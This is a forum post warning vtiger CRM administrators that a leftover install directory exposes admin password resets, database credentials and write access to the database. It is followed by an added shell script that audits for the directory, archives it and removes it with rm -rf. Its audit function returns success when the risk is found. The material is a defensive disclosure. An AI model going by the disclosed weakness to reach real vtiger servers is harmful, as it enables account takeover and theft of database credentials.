vtiger Security Risk

I was installing the latest branch build from svn and thought of a possible security risk in vtiger. I want to make sure everyone is aware of the risk and takes appropriate action (if necessary). The risk involves not removing the install directory after installing vtiger. Though this is a best practice for anyone familiar with web security, I fear that some vtiger users may not remove this directory. It is not mentioned in any of the install documents to remove it.

If the install directory stays on the server after installation, an informed individual could change the admin password without any trouble at all. They could also view the mysql database and username information. With the current changes in the branch, they could also change the SQL database (readonly tags removed). If the files in the install directory are removed after installation is complete, this risk will not exist.

I am working with the branch team to implement an automated solution into the installation for the next release. For any existing installs, please ensure you remove the install directory in the root of the vtiger installation directory. Not doing so puts your implementation at serious risk.

Moderators, please make this post sticky. Thanks.
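A small audit script for the check the post asks administrators to do, added here as an example and not part of the original post or the vtiger project: it reports whether an install directory is still present under a vtiger web root and, if so, archives it outside the web root before deleting it. The web root and backup paths are assumptions passed in as arguments.

```shell
#!/bin/sh
# Added example (not from the original post or vtiger itself).
# Audits a vtiger web root for a leftover post-install "install" directory
# and removes it, keeping an archive copy outside the web root.

# Returns 0 if "$1/install" still exists (risk present), 1 otherwise.
vtiger_install_dir_present() {
  root="$1"
  [ -d "$root/install" ]
}

# Prints a one-line finding for the given web root; exit status mirrors
# vtiger_install_dir_present so it can drive a cron or monitoring job.
vtiger_audit_install_dir() {
  root="$1"
  if vtiger_install_dir_present "$root"; then
    echo "RISK: $root/install still exists; remove it after installation"
    return 0
  fi
  echo "OK: no install directory under $root"
  return 1
}

# Archives "$1/install" into "$2" (a directory outside the web root, created
# if missing) and then deletes it from the web root. Returns 0 on success.
remove_vtiger_install_dir() {
  root="$1"
  backup_dir="$2"
  if ! vtiger_install_dir_present "$root"; then
    echo "nothing to do: $root/install not found"
    return 0
  fi
  mkdir -p "$backup_dir" || return 1
  # Keep a copy so the installer can be inspected or restored offline.
  tar -czf "$backup_dir/vtiger-install-dir.tar.gz" -C "$root" install || return 1
  rm -rf "$root/install" || return 1
  echo "removed $root/install (archive: $backup_dir/vtiger-install-dir.tar.gz)"
  return 0
}
```

Run the audit function from cron against every vtiger root you host; a non-zero exit means nothing was found, which is the state you want.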
